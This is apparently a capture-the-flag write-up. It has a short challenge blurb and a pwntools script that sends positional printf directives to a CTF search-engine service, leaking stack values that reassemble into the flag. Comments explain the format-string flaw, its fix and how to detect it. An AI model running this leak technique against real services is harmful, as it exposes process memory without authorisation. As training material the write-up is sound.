In an attempt to block third party software, we've been using our very own search engine! It doesn't yet have every feature, but at least it's very secure!
Solution
from pwn import *
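context.log_level = 'info'

# Review note: the service echoes the search term back after
# "No result found. You searched for - ", and a positional printf-style
# directive in the term comes back as a pointer-sized value. That symptom
# suggests the input is used as the format string itself (server code is
# not shown here, so this is inferred). The usual server-side fix is to pass
# the input as an argument to a constant format, e.g. printf("%s", query),
# and to build with -Wformat -Wformat-security so the pattern is flagged.
# For detection, search terms containing "%<n>$" directives stand out in
# request logs.

flag = ''

# Probe the positional-argument indexes used in this write-up (12..15).
for i in range(12, 16):
    try:
        # One connection per probe. The context manager closes the socket on
        # every exit path, including exceptions other than EOFError, and
        # avoids touching an unbound `io` when the connection never opened.
        with remote('searchengine.ctf.intigriti.io', 1337, level='warn') as io:
            # %i$p prints the i-th argument as a pointer.
            io.sendline('%{}$p'.format(i).encode())
            # Discard the fixed echo prefix; what follows is the leaked value.
            io.recvuntil(b'No result found. You searched for - ')
            # NOTE(review): recv() returns whatever is buffered, so a split
            # response would yield a truncated value for this index.
            result = io.recv()
    except EOFError:
        # Server hung up before answering; move on to the next index.
        continue

    # "(nil)" means the slot held a null pointer, so there is nothing to decode.
    if b'nil' in result:
        continue

    print('{}: {}'.format(i, result))
    try:
        # Drop the "0x" prefix, unhex, then reverse the bytes: the value is
        # printed as an integer, so in-memory byte order is reversed.
        decoded = unhex(result.strip().decode()[2:])
        reversed_hex = decoded[::-1]
        print(str(reversed_hex))
        # Append this chunk to the flag.
        flag += reversed_hex.decode()
    except ValueError:
        # Not valid hex or not valid UTF-8 (binascii.Error and
        # UnicodeDecodeError are both ValueError subclasses). The original
        # caught BaseException, which also swallowed Ctrl-C and SystemExit.
        continue

# Print the assembled flag.
info(flag)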